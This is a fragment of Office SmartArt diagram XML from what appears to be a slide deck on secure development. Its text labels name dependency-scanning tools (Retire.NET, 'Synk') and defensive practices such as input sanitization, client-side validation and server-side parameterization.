    <dgm:pt modelId="{F2DF52C9-F036-4B72-90E1-E852EEDBF216}" type="parTrans" cxnId="{A0AF6EDD-631E-4723-ADAA-FFD9DBDC7758}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{078E40B4-8741-4094-96D7-CB6182693FEA}" type="sibTrans" cxnId="{A0AF6EDD-631E-4723-ADAA-FFD9DBDC7758}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01F180F0-F507-489A-8A21-8D6FC578E750}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Retire.NET</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{747D6B73-490F-47CB-993C-086D216D2E14}" type="parTrans" cxnId="{C918137F-C798-415F-86B0-EFA95FF6B65D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{414EE193-BA67-40E0-97B8-AD296C547E04}" type="sibTrans" cxnId="{C918137F-C798-415F-86B0-EFA95FF6B65D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8083050C-07CC-46DE-AC8B-E5533B508A34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Synk</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB233C9F-9E35-4906-BA30-41EE6311D399}" type="parTrans" cxnId="{C44F07F3-79D5-4BFA-BE94-C9AA3DEDE50E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCBF387F-AAFD-4582-B44C-F23719199DE7}" type="sibTrans" cxnId="{C44F07F3-79D5-4BFA-BE94-C9AA3DEDE50E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" type="pres">
      <dgm:prSet presAssocID="{EEDEC4FB-3CB6-41DD-B2CF-620CC439B12C}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BCCF47C-DAAA-41DE-A85A-694EC38066AF}" type="pres">
      <dgm:prSet presAssocID="{09F4EC52-4C83-4490-A73A-4B5D6125FB86}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ECD71411-C2E3-45DF-8289-9D38E1DD4A3B}" type="pres">
      <dgm:prSet presAssocID="{09F4EC52-4C83-4490-A73A-4B5D6125FB86}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F799B155-8684-415A-9D51-BD2F2E611DC0}" type="pres">
      <dgm:prSet presAssocID="{09F4EC52-4C83-4490-A73A-4B5D6125FB86}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5E09557B-6C9F-4F0F-A036-6910C9003F73}" type="pres">
      <dgm:prSet presAssocID="{09F4EC52-4C83-4490-A73A-4B5D6125FB86}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F7325A5-F37F-4BEE-8C4F-EB27D295CE57}" type="pres">
      <dgm:prSet presAssocID="{4137AA30-0D09-4630-B780-89001DDB2D82}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBCF6475-8F09-4B07-996D-DB3AE56881C8}" type="pres">
      <dgm:prSet presAssocID="{4137AA30-0D09-4630-B780-89001DDB2D82}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14712C10-51BE-4963-AADD-5D692B90532D}" type="pres">
      <dgm:prSet presAssocID="{4137AA30-0D09-4630-B780-89001DDB2D82}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{533A81B2-D27E-42C2-B1DD-E6DA9009CF2C}" type="pres">
      <dgm:prSet presAssocID="{4137AA30-0D09-4630-B780-89001DDB2D82}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C9F2F6B-774E-4DE0-8F2C-EB5F0670E001}" type="pres">
      <dgm:prSet presAssocID="{01F180F0-F507-489A-8A21-8D6FC578E750}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7795CE19-0667-48F3-9EF3-654A4BC69363}" type="pres">
      <dgm:prSet presAssocID="{01F180F0-F507-489A-8A21-8D6FC578E750}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25DA8D88-9EC0-4943-8FF3-35E94225982C}" type="pres">
      <dgm:prSet presAssocID="{01F180F0-F507-489A-8A21-8D6FC578E750}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78C76603-0CBB-46D7-A37D-F34EA82A4A25}" type="pres">
      <dgm:prSet presAssocID="{01F180F0-F507-489A-8A21-8D6FC578E750}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA6D6451-906F-4C38-AA77-11491D2AED3C}" type="pres">
      <dgm:prSet presAssocID="{8083050C-07CC-46DE-AC8B-E5533B508A34}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9BADCD44-1390-4B6F-85FC-305DE4821E42}" type="pres">
      <dgm:prSet presAssocID="{8083050C-07CC-46DE-AC8B-E5533B508A34}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF4B7546-52DA-4FC3-B64B-6DEB5DA4EC19}" type="pres">
      <dgm:prSet presAssocID="{8083050C-07CC-46DE-AC8B-E5533B508A34}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD85A383-7F6C-498D-ACB3-6142B59BC27B}" type="pres">
      <dgm:prSet presAssocID="{8083050C-07CC-46DE-AC8B-E5533B508A34}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B73DAB21-4F27-4047-AC68-83FF697CFF43}" type="presOf" srcId="{4137AA30-0D09-4630-B780-89001DDB2D82}" destId="{14712C10-51BE-4963-AADD-5D692B90532D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DE4DFA67-8954-423F-AC0E-CD592BD0B02C}" type="presOf" srcId="{01F180F0-F507-489A-8A21-8D6FC578E750}" destId="{25DA8D88-9EC0-4943-8FF3-35E94225982C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8F30A849-7398-4E7F-8354-5AD3E072F5CD}" srcId="{EEDEC4FB-3CB6-41DD-B2CF-620CC439B12C}" destId="{09F4EC52-4C83-4490-A73A-4B5D6125FB86}" srcOrd="0" destOrd="0" parTransId="{0710625D-27C5-476D-8B9C-DB9DDEAD05A7}" sibTransId="{1311C188-A4AA-47E4-803B-1A6B450AB241}"/>
    <dgm:cxn modelId="{C918137F-C798-415F-86B0-EFA95FF6B65D}" srcId="{EEDEC4FB-3CB6-41DD-B2CF-620CC439B12C}" destId="{01F180F0-F507-489A-8A21-8D6FC578E750}" srcOrd="2" destOrd="0" parTransId="{747D6B73-490F-47CB-993C-086D216D2E14}" sibTransId="{414EE193-BA67-40E0-97B8-AD296C547E04}"/>
    <dgm:cxn modelId="{848CADC4-22C7-49F9-A429-A2B420892CE7}" type="presOf" srcId="{09F4EC52-4C83-4490-A73A-4B5D6125FB86}" destId="{F799B155-8684-415A-9D51-BD2F2E611DC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D9FA9FD8-9BD1-4691-BB6C-6619CD25AF40}" type="presOf" srcId="{8083050C-07CC-46DE-AC8B-E5533B508A34}" destId="{EF4B7546-52DA-4FC3-B64B-6DEB5DA4EC19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A0AF6EDD-631E-4723-ADAA-FFD9DBDC7758}" srcId="{EEDEC4FB-3CB6-41DD-B2CF-620CC439B12C}" destId="{4137AA30-0D09-4630-B780-89001DDB2D82}" srcOrd="1" destOrd="0" parTransId="{F2DF52C9-F036-4B72-90E1-E852EEDBF216}" sibTransId="{078E40B4-8741-4094-96D7-CB6182693FEA}"/>
    <dgm:cxn modelId="{9C6089DF-75BC-410D-AB9E-F20D00EEA72A}" type="presOf" srcId="{EEDEC4FB-3CB6-41DD-B2CF-620CC439B12C}" destId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C44F07F3-79D5-4BFA-BE94-C9AA3DEDE50E}" srcId="{EEDEC4FB-3CB6-41DD-B2CF-620CC439B12C}" destId="{8083050C-07CC-46DE-AC8B-E5533B508A34}" srcOrd="3" destOrd="0" parTransId="{AB233C9F-9E35-4906-BA30-41EE6311D399}" sibTransId="{CCBF387F-AAFD-4582-B44C-F23719199DE7}"/>
    <dgm:cxn modelId="{91152192-5C20-4E08-815C-641E5B88F13F}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{8BCCF47C-DAAA-41DE-A85A-694EC38066AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{865653FF-A078-41A6-B94E-109FC9A8D862}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{ECD71411-C2E3-45DF-8289-9D38E1DD4A3B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3F5F3A2E-9A76-4271-B35E-44C8E9C1FB8E}" type="presParOf" srcId="{ECD71411-C2E3-45DF-8289-9D38E1DD4A3B}" destId="{F799B155-8684-415A-9D51-BD2F2E611DC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{73B2C8BA-0357-4958-B1EE-0BE76B384F73}" type="presParOf" srcId="{ECD71411-C2E3-45DF-8289-9D38E1DD4A3B}" destId="{5E09557B-6C9F-4F0F-A036-6910C9003F73}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A131DA26-230A-43AB-8C54-709585C3D7D2}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{7F7325A5-F37F-4BEE-8C4F-EB27D295CE57}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{FE5C612A-F077-4C29-B884-D6CBF00B0CFD}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{FBCF6475-8F09-4B07-996D-DB3AE56881C8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D82E8A59-684A-4928-8540-E1C0376B4E01}" type="presParOf" srcId="{FBCF6475-8F09-4B07-996D-DB3AE56881C8}" destId="{14712C10-51BE-4963-AADD-5D692B90532D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{007829C7-4399-4F55-9D39-86689F72FD7F}" type="presParOf" srcId="{FBCF6475-8F09-4B07-996D-DB3AE56881C8}" destId="{533A81B2-D27E-42C2-B1DD-E6DA9009CF2C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{AA31C2ED-8B62-4E07-932C-991AD182F124}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{2C9F2F6B-774E-4DE0-8F2C-EB5F0670E001}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8D6F8682-6AE7-43DF-B6D2-A624DFE4B4C6}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{7795CE19-0667-48F3-9EF3-654A4BC69363}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{59625FF0-A87D-4E44-974C-36FC80B69E10}" type="presParOf" srcId="{7795CE19-0667-48F3-9EF3-654A4BC69363}" destId="{25DA8D88-9EC0-4943-8FF3-35E94225982C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{96F82CDD-E98C-445F-B211-F135894B7B3A}" type="presParOf" srcId="{7795CE19-0667-48F3-9EF3-654A4BC69363}" destId="{78C76603-0CBB-46D7-A37D-F34EA82A4A25}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{70EA5772-CAFA-46B4-87C4-CFCB86E15A75}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{EA6D6451-906F-4C38-AA77-11491D2AED3C}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D38F9D0B-A7A4-4078-8FB3-348C14DAA7BF}" type="presParOf" srcId="{066A9BCA-895B-41A6-AFDD-494D62520C83}" destId="{9BADCD44-1390-4B6F-85FC-305DE4821E42}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A8255CAA-FD45-46ED-88CE-C031C3ED1EA4}" type="presParOf" srcId="{9BADCD44-1390-4B6F-85FC-305DE4821E42}" destId="{EF4B7546-52DA-4FC3-B64B-6DEB5DA4EC19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7B43B50F-1C7A-451F-8312-737EB9EC5497}" type="presParOf" srcId="{9BADCD44-1390-4B6F-85FC-305DE4821E42}" destId="{CD85A383-7F6C-498D-ACB3-6142B59BC2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44D5FB-D1B7-4630-8FB6-B49147923C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0E0A24-F863-42E3-91DD-00B1BD8BED38}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Sanitize your inputs</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A31B927-F922-4D2D-8132-39008CDD257F}" type="parTrans" cxnId="{FF67C3E1-D4D1-424A-88FE-43E1469E1168}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1178BD54-B5D7-40B6-B747-9EE94413018F}" type="sibTrans" cxnId="{FF67C3E1-D4D1-424A-88FE-43E1469E1168}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F1971BF-D8F1-4C33-8D32-D88EDD424710}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Input Validation (Client-Side)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{740CAB83-3490-4A49-AA11-00A2564100AD}" type="parTrans" cxnId="{6DDF4C82-EDA3-44BF-896B-D964D0A32651}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5719400-B7BC-48FA-BEED-77778D0F7543}" type="sibTrans" cxnId="{6DDF4C82-EDA3-44BF-896B-D964D0A32651}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C347A41F-301D-4A2C-878E-E1A06979E448}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Sanitize your inputs</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43346761-52F4-4067-B3AC-3A9DEB08897E}" type="parTrans" cxnId="{720C447E-2C08-439F-808D-3309AF286C53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9C8539A-0A48-4543-AA1C-C23724EE817C}" type="sibTrans" cxnId="{720C447E-2C08-439F-808D-3309AF286C53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41A0C1F6-EAB3-488F-992B-EBE67A592709}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Parameterization (Server-Side)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A35F6233-CB73-4F92-A1AA-1879C60B26E0}" type="parTrans" cxnId="{9D1264E4-A129-44FD-8F3E-177F8B017A8F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58F5F693-8C1F-475F-8FDD-36F0D36062A2}" type="sibTrans" cxnId="{9D1264E4-A129-44FD-8F3E-177F8B017A8F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69B2507F-EF4F-4F86-BCCF-0DA8907DD19C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Sanitize your inputs</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02227759-59F4-48E0-8644-05FD6D8051DD}" type="parTrans" cxnId="{D0B6CE77-BFD0-4F84-918E-509422651082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{591538BC-5DE9-4DF7-87D2-A67F720BD22C}" type="sibTrans" cxnId="{D0B6CE77-BFD0-4F84-918E-509422651082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" type="pres">
      <dgm:prSet presAssocID="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{297E92E4-2F0B-48DF-A576-B9243DB5FFB3}" type="pres">
      <dgm:prSet presAssocID="{930E0A24-F863-42E3-91DD-00B1BD8BED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9D4BD3-BF87-4B9A-AE91-FD449FEE6C7D}" type="pres">
      <dgm:prSet presAssocID="{1178BD54-B5D7-40B6-B747-9EE94413018F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BD07CAA-D623-4A1C-84D3-9DB171BBB3FA}" type="pres">
      <dgm:prSet presAssocID="{7F1971BF-D8F1-4C33-8D32-D88EDD42471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45FB543-C47E-46A4-AB01-CDF725A77E0A}" type="pres">
      <dgm:prSet presAssocID="{C5719400-B7BC-48FA-BEED-77778D0F7543}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{336373FA-96DC-45CF-96D9-9B7ED5B5108D}" type="pres">
      <dgm:prSet presAssocID="{C347A41F-301D-4A2C-878E-E1A06979E44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E91414-2112-49B8-B5DC-C4ADD66B72BC}" type="pres">
      <dgm:prSet presAssocID="{F9C8539A-0A48-4543-AA1C-C23724EE817C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95D10609-E99B-420D-86D9-12B6B2EB2665}" type="pres">
      <dgm:prSet presAssocID="{41A0C1F6-EAB3-488F-992B-EBE67A59270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118F2C7-FCCE-4536-8185-D30E81C3FD4F}" type="pres">
      <dgm:prSet presAssocID="{58F5F693-8C1F-475F-8FDD-36F0D36062A2}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DDA7A62-3E2C-4F2F-A0B5-01B80F66621D}" type="pres">
      <dgm:prSet presAssocID="{69B2507F-EF4F-4F86-BCCF-0DA8907DD19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3F7E711-1653-4324-84B4-B13F35B5F7FA}" type="presOf" srcId="{41A0C1F6-EAB3-488F-992B-EBE67A592709}" destId="{95D10609-E99B-420D-86D9-12B6B2EB2665}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D0B6CE77-BFD0-4F84-918E-509422651082}" srcId="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" destId="{69B2507F-EF4F-4F86-BCCF-0DA8907DD19C}" srcOrd="4" destOrd="0" parTransId="{02227759-59F4-48E0-8644-05FD6D8051DD}" sibTransId="{591538BC-5DE9-4DF7-87D2-A67F720BD22C}"/>
    <dgm:cxn modelId="{720C447E-2C08-439F-808D-3309AF286C53}" srcId="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" destId="{C347A41F-301D-4A2C-878E-E1A06979E448}" srcOrd="2" destOrd="0" parTransId="{43346761-52F4-4067-B3AC-3A9DEB08897E}" sibTransId="{F9C8539A-0A48-4543-AA1C-C23724EE817C}"/>
    <dgm:cxn modelId="{6DDF4C82-EDA3-44BF-896B-D964D0A32651}" srcId="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" destId="{7F1971BF-D8F1-4C33-8D32-D88EDD424710}" srcOrd="1" destOrd="0" parTransId="{740CAB83-3490-4A49-AA11-00A2564100AD}" sibTransId="{C5719400-B7BC-48FA-BEED-77778D0F7543}"/>
    <dgm:cxn modelId="{531CE191-B447-4445-BBAE-459265897BD0}" type="presOf" srcId="{7F1971BF-D8F1-4C33-8D32-D88EDD424710}" destId="{6BD07CAA-D623-4A1C-84D3-9DB171BBB3FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C2D80DA7-200E-41E2-A4B5-F92E4545099D}" type="presOf" srcId="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" destId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0734B8D2-DC03-4154-87B3-CFE37748CA35}" type="presOf" srcId="{C347A41F-301D-4A2C-878E-E1A06979E448}" destId="{336373FA-96DC-45CF-96D9-9B7ED5B5108D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2812B1DD-7625-4253-82BA-B73D24B8F208}" type="presOf" srcId="{930E0A24-F863-42E3-91DD-00B1BD8BED38}" destId="{297E92E4-2F0B-48DF-A576-B9243DB5FFB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FF67C3E1-D4D1-424A-88FE-43E1469E1168}" srcId="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" destId="{930E0A24-F863-42E3-91DD-00B1BD8BED38}" srcOrd="0" destOrd="0" parTransId="{0A31B927-F922-4D2D-8132-39008CDD257F}" sibTransId="{1178BD54-B5D7-40B6-B747-9EE94413018F}"/>
    <dgm:cxn modelId="{9D1264E4-A129-44FD-8F3E-177F8B017A8F}" srcId="{5244D5FB-D1B7-4630-8FB6-B49147923C55}" destId="{41A0C1F6-EAB3-488F-992B-EBE67A592709}" srcOrd="3" destOrd="0" parTransId="{A35F6233-CB73-4F92-A1AA-1879C60B26E0}" sibTransId="{58F5F693-8C1F-475F-8FDD-36F0D36062A2}"/>
    <dgm:cxn modelId="{DBF85CFD-FF94-4398-B306-D5B3E3D28294}" type="presOf" srcId="{69B2507F-EF4F-4F86-BCCF-0DA8907DD19C}" destId="{0DDA7A62-3E2C-4F2F-A0B5-01B80F66621D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C906CCF4-08EB-4125-93EF-AE0B04E8F76D}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{297E92E4-2F0B-48DF-A576-B9243DB5FFB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E38BA55F-CB54-4F66-AAC9-5207033506B9}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{7A9D4BD3-BF87-4B9A-AE91-FD449FEE6C7D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{349C7494-0B67-4C82-8055-646C6757F3C7}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{6BD07CAA-D623-4A1C-84D3-9DB171BBB3FA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A8F5CA49-81D6-4B5B-8288-78A62C42A649}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{645FB543-C47E-46A4-AB01-CDF725A77E0A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
